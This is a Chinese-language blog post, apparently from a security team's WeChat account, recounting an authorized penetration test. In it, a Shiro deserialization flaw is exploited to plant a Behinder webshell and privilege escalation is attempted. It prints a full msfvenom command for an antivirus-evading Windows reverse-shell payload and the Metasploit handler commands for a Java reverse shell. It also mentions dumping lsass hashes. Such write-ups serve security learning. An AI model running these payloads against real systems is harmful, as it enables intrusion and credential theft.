前言
在某次对业主单位的渗透过程中,偶然发现某系统存在的一个shiro反序列化漏洞,于是开启了我的渗透提权之路。
渗透过程分享
01
漏洞发现及利用
故事的开始是这样
由于是授权单位,常规先丢进扫描器瞎一通乱扫。
哦哟,怎么有个红红的感叹号!让我看看发现了什么大宝贝?
请输入标题 abcdefg
原来是我们的老朋友shiro反序列化漏洞,不多说,直接掏出exp就是干!
果然有东西,直接找个路径上传冰蝎马拿webshell
浏览器访问下,看来是上传成功了!
02
冰蝎给我连!
先看看权限,local service,比较低啊,看来得想办法提权,或者直接把管理员密码dump下来。
Systeminfo看了下,是2012R2的系统,默认是没办法直接从lsass.exe中读取到明文账户密码,只能读hash下来解密碰碰运气。
先生成个msf马反弹个shell看看。
msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=x.x.x.x LPORT=7777 -e x86/shikata_ga_nai -i 15 -b 'x00' -f exe > 360.exe
payload 选择 windows/meterpreter/reverse_tcp,LHOST和LPORT分别填攻击机ip和MSF监听的端口,-e x86/shikata_ga_nai -i 15是用 x86/shikata_ga_nai 编码器编码15次以简单绕过av检测。
Msf开启监听,先上传到目标主机看看吧,当我要执行的时候,马子消失了。
大意了,看来是有杀软,看看进程,好家伙,还不止一个,360全家桶和安全狗套餐,得想办法免杀了。
免杀菜鸟哭唧唧,突然想起来冰蝎好像自带个反弹shell的功能,试用下。
Msf输入:
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 7777
exploit
反弹成功!
先getsystem,什么?没有这个命令?那我窃取令牌提权总可以吧,也没有?
Jsp的payload可把我难住了,这么多功能都没有拿啥提权。
把systeminfo贴下来,查看可用的提权exp,尝试了2012受影响的exp,均以失败告终。
果然菜才是原罪。研究下免杀,下次再战,先把漏洞报告提交给客户吧!
声明:
本公众号发表的原创文章,作为技术分享使用,均基于作者的主观判断,代表个人理解,并不保证一定正确,仅供大家参考。
Forest Team拥有该文章的修改和解释权。如欲引用、转载或传播此文章,必须包括版权声明等全部内容。未经Forest Team允许,不得任意修改或删减文章内容,不得以任何方式将其用于商业目的。
Forest Team
微信号|ForestTeam
本文始发于微信公众号(Forest Team):记一次授权单位的渗透测试过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论